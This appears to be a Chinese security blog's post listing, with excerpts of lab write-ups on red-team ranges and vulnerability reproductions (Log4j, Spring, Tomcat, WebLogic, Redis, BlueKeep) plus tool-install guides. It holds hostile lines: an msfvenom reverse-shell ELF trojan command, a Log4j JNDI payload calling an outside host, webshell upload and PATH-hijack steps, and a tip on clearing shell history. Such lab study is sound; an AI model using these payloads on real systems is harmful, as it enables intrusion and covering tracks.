- 博客(21)
- 收藏
- 关注
RSS订阅原创 【红日靶场系列】ATT&CK红队评估7
cd到/home/jobs目录下,运行一下这个文件,可以看到shell文件执行了ps命令,并且未使用绝对路径,所以我们可以尝试更改$PATH来执行我们的恶意程序,从而获得目标主机的高权限shell。有Ubuntu这个用户,就可以把我们自己生成的SSH密钥写入到/test/home/ubuntu/.ssh目录中的authorized_keys文件中,写入成功之后就可以使用该密钥进行登陆该机器。这样,第二层网络中的所有主机皆可以上网,但是位于第三层网络中的所有主机都不与外网相连通,不能上网。
2022-10-16 03:25:04
2133
1
原创 kali中清除历史命令
kali 默认的 shell 环境已经从 bash 更改为 zsh,而history -c需要在bash环境下运行。因此执行history -c会报错。
2022-10-14 15:09:42
4254
原创 【红日靶场系列】ATT&CK红队评估5
SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons链接后,子Beacon从父Beacon获取到任务并发送。因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效。黄金票据可以在拥有普通域用户权限和KRBTGT账号的哈希的情况下用来获取域管理员权限,上面已经获得域控的 system 权限了,还可以使用黄金票据做权限维持,当域控权限掉后,在通过域内其他任意机器伪造票据重新获取最高权限。
2022-09-29 15:20:53
1721
原创 【红日靶场系列】ATT&CK红队评估3
IPC(Internet Process Connection)是共享“命名管道”的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。连接成功,这里虽然找到了管理员的账号密码,但是密码是被加密的,而加密方式也并不知道(其实一般的网站后台账号的加密方式是MD5,这种的就可以直接将“123456”进行加密把他的替换掉,就可以登陆了,前提是要备份一下他原先的密码;但是这种就不能使用这种方式了)
2022-09-14 17:44:17
1318
原创 【红日靶场系列】ATT&CK红队评估1
内网渗透学习过程,简单记录一下靶场下载地址:今天做的是第一个ATT&CK实战系列——红队实战(一)下载下来之后一共有三个虚拟机,解压到虚拟机目录下分别对应的是Windows7,Windows Server 2003和Windows Server 2008。另外我们还需要一台攻击机,这里选用的是kali2022.1(其实真实环境自己主机就相当于攻击机),网络拓扑图如下所示:靶场提供的三个主机在同一个网段中,另外Win7主机有两张网卡,模拟可以与外网进行通信的主机,且安装有phpstudy,部署了we
2022-07-06 22:37:12
2937
原创 -bash: docker-compose: command not found解决办法
安装pip升级pip安装docker-compose插件验证是否安装成功
2022-06-30 11:44:38
683
原创 Centos8安装docker及AWVS
云服务器:Centos8.4本机:windows11查看Centos版本卸载旧版的docker(没安装过跳过)安装yum-utils添加阿里云的镜像docker的仓库(官方的太慢,这个很快)查看存放所有的yum仓库文件查看文件安装docker启动docker设置开机自启查看docker进程是否启动测试一个docker容器到这里docker就安装好了,接下来安装AWVS搜索AWVS镜像选取一个较新的版本拉取下来查看镜像列表启动容器,将docker的3443
2022-06-28 21:46:20
1092
原创 【漏洞复现】CVE-2019-0708(BlueKeep)
2019年5月14日微软官方发布安全补丁,修复了 Windows 远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的 Windows 系统。此漏洞是预身份验证,无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用,与2017年 WannaCry 勒索病毒的传播方式类似。存在漏洞的远程桌面服务器,在接收到特殊数据包时会释放一个内部信道 MS_T120 的控制结构体,但并未将指向该结构体的指针删除,而且在远程桌面连接结束之后还会调用 MS_T120 结构体内的一个函数指针,若攻击者可通过远程发送数
2022-06-14 23:39:38
3719
原创 Burpsuite2021.10安装详细教程
百度网盘链接:链接:https://pan.baidu.com/s/1AKS54jtyN6Ohkt1VDZ0Jiw提取码:v73p下载之后解压,解压之后会有两个文件点击jdk-18_windows-x64_bin.exe进行安装然后对应的安装目录查看是否有jdk的文件打开该文件夹,看是否有jre文件夹,我这里就没有没有jre文件参考大佬的方案:https://blog.csdn.net/qq_41219157/article/details/109667631可以看到jre文件
2022-05-31 19:54:16
26319
25
原创 【Vulfocus漏洞复现】spring-core-rce-2022-03-29
2022年3月30日,Spring框架曝出RCE 0day漏洞,国家信息安全漏洞共享平台(CNVD)已收录了Spring框架远程命令执行漏洞(CNVD-2022-23942),考虑到Spring框架的广泛应用,漏洞被评级为危险。通过该漏洞可写入webshell以及命令执行。在Spring框架的JDK9版本(及以上版本)中,远程攻击者可在满足特定条件的基础上,通过框架的参数绑定功能获取AccessLogValve对象并诸如恶意字段值,从而触发pipeline机制并写入任意路径下的文件。漏洞利用条件1、A
2022-04-15 13:58:26
5411
原创 【Vulfocus漏洞复现】log4j2-cve-2021-44228
vps:centos8 腾讯云本地:windows11靶场环境:http://123.58.236.76:64936/访问靶场环境http://123.58.236.76:64936/点击???burp抓包,DNSlog验证漏洞是否存在构造payload=${jndi:ldap://7272sq.ceye.io},并在burp中请求数据,返回400payload=${jndi:ldap://7272sq.ceye.io}对payload进行url编码(burp自带),再次进行请求,
2022-04-13 15:56:06
3993
原创 【Vulfocus漏洞复现】fastjson-cnvd_2017_02833、fastjson-cnvd_2019_22238
vps:centos8 腾讯云本地:windows11靶场环境:http://123.58.236.76:24477/访问靶场环境:http://123.58.236.76:24477/burp进行抓包,将请求方式改为POST,能够请求json数据,可能存在fastjson漏洞准备两个东西:Exploit.class、marshalsec-0.0.3-SNAPSHOT-all.jar(准备过程不详述,网上都有)在本地创建Exploit.java,内容如下import java.io.Buf
2022-04-12 17:22:08
4479
原创 msf生成linux elf木马反弹shell
最开始用的生成木马的命令msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=8888 -f elf > mshell.elf生成木马只有250b,显然是不成功的问题根源:msf版本不同导致语法不同msf5版本的命令msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=8888 -f elf >
2022-04-08 15:48:47
12194
3
原创 【Vulfocus漏洞复现】tomcat-cve_2017_12615
访问目标http://123.58.236.76:15450/burp抓包修改请求方式为PUT,增加POST请求体PUT /shell.jsp/ HTTP/1.1Host: 123.58.236.76:15450Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
2022-04-07 15:37:54
512
原创 【已解决】The unauthenticated git protocol on port 9418 is no longer supported.
通过官方指导链接可以看到,github最新修改了安全协议,不再支持git,需要用https进行请求。https://github.blog/2021-09-01-improving-git-protocol-security-github/解决方法:git config --global url."https://github.com/".insteadof git@github.com:// 或(根据使用远程包的原先的地址来替换)git config --global url."https:/
2022-04-07 15:02:43
943
1
原创 【Vulfocus漏洞复现】weblogic-cve_2018_2894
漏洞描述WebLogic管理端未授权的两个页面存在任意上传getshell漏洞,可直接获取权限。两个页面分别为/ws_utc/begin.do,/ws_utc/config.do影响范围weblogic 10.3.6.0weblogic 12.1.3.0weblogic 12.2.1.2weblogic 12.2.1.3漏洞复现访问靶场http://123.58.236.76:61812/console/login/LoginForm.jsp访问漏洞利用点/ws_utc/confi
2022-04-02 17:39:52
2262
原创 【Vulfocus漏洞复现】redis-cnvd_2019_21763、redis-cnvd_2015_07557
vps:腾讯云 centos8本地:windows11靶场环境:http://123.58.236.76:47109/在vps上执行以下命令git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommandcd RedisModules-ExecuteCommand/make编译之后继续执行命令git clone https://github.com/Ridter/redis-rce.gitcd redis-rce/
2022-04-02 16:22:26
3893
6
原创 CentOS8安装java环境
卸载老版本1.卸载可能存在的CentOS自带的java环境#rpm -qa|grep java#rpm -qa|grep jdk#rpm -qa|grep gcj2.如果有,卸载#rpm -e --nodeps java–1.8.xxxxxxxxxxxxxxxxxxxxxxxxxxx安装1.下载java二进制包https://www.oracle.com/,jdk-8u241-linux-x64.tar.gz2.通过winscp或其他方式上传到CentOS8系统,解压缩,移到到/usr/o
2022-03-31 15:43:41
2792
原创 渗透测试-快速全面搜集站点下的资产小技巧
废话不多说,当对一个网站各种工具、功能点、思路都用上之后,还是觉得会不会遗漏了什么资产的时候怎么办,在用burp进行渗透测试的过程中,burp会基于数据包对该站点的资产进行爬虫1.右键2.save selected items3.保存为1.txt至桌面4.用sublime打开1.txt关注url这个标签,用正则匹配所有的url标签粘贴到任意空白文件中,将所有除url外的干扰项替换为空最终结果亲测比dirsearch、jsfinder等寻找资产的时间来得短且更全面,能发现一些其他的
2022-03-29 10:41:58
2221
原创 Centos8安装msf
环境:centos8 腾讯云操作步骤:下载erb文件,国内下载不了,需要借助第三方的下载平台:https://ghproxy.com/具体流程:访问https://ghproxy.com/在输入框输入erb文件的下载地址,并点击下载https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb
2022-03-25 10:01:34
2633
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人